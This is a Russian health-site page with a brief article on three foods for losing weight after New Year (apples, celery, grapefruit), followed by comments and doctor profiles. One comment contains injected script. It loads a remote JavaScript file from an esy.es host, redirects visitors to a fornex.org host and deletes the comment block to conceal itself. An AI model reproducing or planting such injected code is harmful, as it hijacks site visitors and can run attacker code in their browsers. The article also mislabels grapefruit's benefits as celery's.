Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Еда для похудения после Н...  >>  Еда для похудения после Нового года
 
Обратная связь
 

Еда для похудения после Нового года

Размер шрифта
10 января 2012 08:07
  • google_analytics: false
  • Нравится

Не вся еда на нашем праздничном столе полезна и низкокалорийна. Как сбросить вес после новогодних праздников, не садясь на диету? Представляем 3 продукта для похудения.

1

  1. Яблоки

Плюсы яблока:

  • Грубые волокна. Они разбухают в кишечнике и замедляют всасывание сахаров в кровь. В результате вы долго не чувствуете голод.
  • Пектин в яблоках связывает углеводы и «обманывает» рецепторы – говорит им, что желудок уже сыт.
  1. Сельдерей

Плюсы сельдерея:

  • Большое количество грубых волокон. Они не перевариваются и не всасываются в кишечнике, а проталкивают пищу и формируют пищевой комок, который легко проходит по кишечнику. В результате в кишечнике нормальная перистальтика, а у вас нет запоров и лишнего веса.
  1. Грейпфрут

Плюсы сельдерея:

  • Низкий гликемический индекс. Грейпфрут не вызывает выброс инсулина в кровь сразу после того, как вы его съели. Сахар всасывается медленно, и вы долго не испытываете голода.
  • Грейпфрут довольно горький – далеко не всю еду захочется съесть после него.


Сюжеты по теме:
Еда для похудения после Нового Года

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.